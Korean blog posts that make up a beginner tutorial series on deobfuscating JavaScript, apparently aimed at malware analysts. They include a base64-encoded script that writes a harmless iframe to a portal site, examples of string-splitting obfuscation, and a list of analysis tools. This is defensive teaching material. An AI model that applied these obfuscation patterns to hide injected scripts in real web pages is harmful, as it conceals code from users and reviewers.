<script> str="PGlmcmFtZSBzcmM9aHR0cDovL2NhZmUubmF2ZXIuY29tIHdpZHRoPTgwMCBoZWlnaHQ 9NTAwPjwvaWZyYW1lPiA="; var b64c = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefg'+'hijklmnopqrstuvwxyz0123456789+/='; var b64d = '', chr1, chr2, chr3, enc1, enc2, enc3, enc4; str = str.replace(/[^a-z0-9+/=]/gi, ''); for (var i=0; i<str.length;) { enc1 = b64c.indexOf(str.charAt(i++)); enc2 = b64c.indexOf(str.charAt(i++)); enc3 = b64c.indexOf(str.charAt(i++)); enc4 = b64c.indexOf(str.charAt(i++)); chr1 = (enc1 << 2) | (enc2 >> 4); chr2 = ((enc2 & 15) << 4) | (enc3 >> 2); chr3 = ((enc3 & 3) << 6) | enc4; b64d = b64d + String.fromCharCode(chr1); if (enc3 < 64) { b64d += String.fromCharCode(chr2); } if (enc4 < 64) { b64d += String.fromCharCode(chr3); } } document.write(b64d); </script> ## 결과 cafe.naver.com 으로 접속 시도한다 (예제 4번과 동일한 이유)
|
① 위와 같은 스크립트를 이용하여 복호화 할 수 있다
② 예제 4번과 동일한 방법으로 복호화된 문자열을 볼 수 있다
4. 간단하게 디코딩 하기
4.1. TRANSLATOR, BINARY
코드에 익숙해지기 위해 자바스크립트로 디코딩을 해보았다. 하지만 어떤 코드인지 안다면
아래의 사이트에서 간단하게 모두 디코딩 할 수 있다
바로가기: http://home.paulschou.net/tools/xlate/
[그림1] 디코딩 화면
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
|---|---|
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |
| [1] 자바스크립트 난독화 기초 (3) | 2013.05.03 |
글
[2] 자바스크립트 난독화 Tool
[2] 자바스크립트 난독화 Tool
1. 난독화 해제에 사용되는 툴
※ 소개되는 툴들은 난독화해제시 사용하는 것들로 기본적인 사용법을 익혀두면 좋다
1.1. 에디트플러스
난독화 및 코딩을 도와주는 문서 편집기로 가장 많이 사용하는 프로그램이다 (29.700원)
에디트플러스 사이트: http://www.editplus.com/kr/index.html
1.2. TRANSLATOR, BINARY
Text, binary, hex, base64, ascii code로 변환해 주는 사이트
TRANSLATOR, BINARY: http://home.paulschou.net/tools/xlate/
1.3. Malzila
Malware hunting tool !! (오픈소스)
난독화해제 및 악성코드 분석에 많이 사용되는 오픈소스 툴로 hex값 Xor 및 다양한
용도로 이용된다
Malzilla download: http://malzilla.sourceforge.net/
1.4. HEX Editor
무료 HEX 에디터 툴로 hex edit 및 hex 값을 파일로 생성시 사용
다운로드 사이트: http://mh-nexus.de/en/hxd/
1.5. PDF Stream Dumper
PDF 분석 사용하는 툴로 PDF에 포함된 스크립트 및 난독화 분석 시 이용
다운로드 사이트: http://sandsprite.com/blogs/index.php?uid=7&pid=57
1.6. Paros(parosproxy)
Paros는 Web proxy툴로 Web의 취약점 분석과 웹해킹 도구로 사용
나는 악성코드 유포지로 유도하는 위/변조 사이트를 찾기 위해 주로 사용 한다
☞ Paros는 JDK가 설치되어야 실행가능하며 사용하기 전 웹설정(proxy)이 필요하다
다운로드 사이트: http://www.parosproxy.org/
1.7. Java Decompiler
.jar 파일을 java코드로 디컴파일하여 보여주는 툴
다운로드 사이트: http://java.decompiler.free.fr/
1.8. Sothink SWF Decompiler
.swf(flash file)을 분리하여 볼 수 있는 프로그램
☞ Sothink SWF Decompiler가 없다면 다른 swf 분석 프로그램을 사용하여도 된다
다운로드 사이트: …
※ 개인적으로 사용하는 툴을 소개한 것이며, 각자의 취향에 따라 다른 툴을 사용해도 된다
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
|---|---|
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |
| [1] 자바스크립트 난독화 기초 (3) | 2013.05.03 |
글
난독화 스터디 시작!!
나는 자바스크립트를 공부해 본적이 없다.
하지만 자바스크립트로 난독화 된 악성코드를 분석하는 것에 흥미가 많고 재미있다.
난독화 공부를 하고 싶지만 관련된 자료가 많지 않아 공부하기 힘든 나같은 사람들을 위해
내가 아는 지식들을 정리해 보기로 했다!!
얼마나 할지는 모르겠지만 ㅎㅎ
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
|---|---|
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| [1] 자바스크립트 난독화 기초 (3) | 2013.05.03 |
글
[1] 자바스크립트 난독화 기초
[1] 자바스크립트 난독화 기초
1. 난독화란?
프로그래밍 언어로 작성된 코드를 읽기 어렵게 만드는 작업
2. 난독화의 기본 예
예제)
|
<script> open(“http://naver.com”); </script>
⇒ <script>a="http";b="://";c="naver";d=".com";open(a+b+c+d);</script> |
3. 난독화 해제(복호화)의 원리
1) 난독화 되어 있는 스크립트는 실행되기 위해 복호화되어 특정 변수에 저장된다
☞ 복호화된 데이터가 저장된 변수를 ‘key변수’라고 부르겠다
2) 복호화된 데이터를 실행하기 위해서 실행함수가 사용된다
3) 실행함수를 문자로 나타내는 함수로 변환하여 복호화된 스크립트를 확인할 수 있다
4. 난독화 해제에 사용되는 함수
1) alert(key변수);
2) document.write(key변수);
3) document.write(“<xmp>”+key변수+”</xmp>”);
4) document.write(“<textarea>”+key변수+”</textarea>”);
'난독화 > 난독화 강좌' 카테고리의 다른 글
| [5] 블랙홀 툴킷의 PDF 난독화 풀이 (2) | 2013.05.13 |
|---|---|
| [4] 난독화 연습 문제풀이 따라하기 I (4) | 2013.05.08 |
| [3] 자바스크립트 난독화 기초 2 (0) | 2013.05.04 |
| [2] 자바스크립트 난독화 Tool (0) | 2013.05.04 |
| 난독화 스터디 시작!! (0) | 2013.05.03 |